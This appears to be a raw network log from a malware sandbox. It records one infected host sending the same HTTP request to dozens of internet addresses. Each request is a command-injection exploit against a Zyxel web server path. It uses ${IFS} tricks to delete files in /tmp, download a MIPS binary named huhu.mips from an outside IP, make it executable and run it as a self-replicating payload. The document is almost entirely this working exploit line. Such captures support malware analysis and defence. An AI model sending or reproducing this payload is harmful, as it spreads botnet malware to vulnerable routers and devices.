                                      Jan 19, 2024 17:29:34.817025900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4931192.168.2.1443258200.77.146.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.817059994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4932192.168.2.143681682.61.226.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.817087889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4933192.168.2.1442530170.118.24.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.817137957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4934192.168.2.1455864163.30.135.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.817183018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4935192.168.2.1439324120.134.68.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.817225933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4936192.168.2.143288666.89.196.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.817266941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4937192.168.2.146001485.83.184.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.817312956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4938192.168.2.1448696155.138.216.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.817358017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4939192.168.2.1443816153.158.219.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.817411900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4940192.168.2.145886240.134.222.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.817449093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4941192.168.2.145593813.97.11.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.817487001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4942192.168.2.143840451.105.247.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.817527056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4943192.168.2.1438054120.29.230.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.817579985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4944192.168.2.1443292111.42.98.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.817626953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4945192.168.2.1433178159.75.15.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.817658901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4946192.168.2.1441332187.222.251.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.817694902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4947192.168.2.144834219.251.122.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.817730904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4948192.168.2.1457936126.10.150.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.817779064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4949192.168.2.145911648.15.201.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.817826033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4950192.168.2.1455404141.186.160.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.817871094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4951192.168.2.145196496.32.17.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.817902088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4952192.168.2.1434506147.146.136.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.817959070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4953192.168.2.1457784194.216.4.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.818008900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4954192.168.2.1451986201.191.101.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.818063974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4955192.168.2.1457922131.91.22.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.818108082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4956192.168.2.143430299.153.65.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.818144083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4957192.168.2.1458568197.33.160.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.818177938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4958192.168.2.143718227.143.47.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.818209887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4959192.168.2.14332288.108.27.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.818264961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4960192.168.2.1450002210.165.179.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.818305969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4961192.168.2.144859086.109.108.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.818353891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4962192.168.2.144639479.230.3.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.818377018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4963192.168.2.1433062159.194.127.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.818403959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4964192.168.2.1449090220.109.87.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.818449020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4965192.168.2.1452278123.56.13.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.818459034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4966192.168.2.1451144177.53.190.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.818474054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4967192.168.2.1444266211.15.131.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.818515062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4968192.168.2.1444862112.83.33.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.818540096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4969192.168.2.1451400113.20.61.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.818581104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4970192.168.2.1437032158.41.45.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.818605900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4971192.168.2.144382031.161.100.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.818670988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4972192.168.2.144345099.142.47.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.818697929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4973192.168.2.144369282.167.97.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.818756104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4974192.168.2.144639299.193.148.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.818789005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4975192.168.2.143502638.164.166.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.818831921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4976192.168.2.145660438.90.225.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.818885088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4977192.168.2.144516625.43.27.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.818913937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4978192.168.2.145937453.143.95.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.818962097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4979192.168.2.1441552187.139.148.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.818996906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4980192.168.2.1448826130.145.20.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.819035053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4981192.168.2.144050480.129.47.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.819077969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4982192.168.2.143970240.254.36.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.819129944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4983192.168.2.145579467.16.249.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.819159031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4984192.168.2.144077473.29.79.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.819186926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4985192.168.2.143886219.241.13.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.819246054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4986192.168.2.143347027.253.169.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.819278002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4987192.168.2.1444546119.32.115.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.819320917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4988192.168.2.1448364171.199.46.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.819354057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4989192.168.2.14510882.195.45.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.819423914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4990192.168.2.1449670164.20.109.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.819453001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4991192.168.2.1443790119.48.53.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.819487095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4992192.168.2.143999093.209.87.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.819534063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4993192.168.2.145966285.186.132.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.819593906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4994192.168.2.1447778108.33.174.103443
                                      TimestampBytes transferredDirectionData
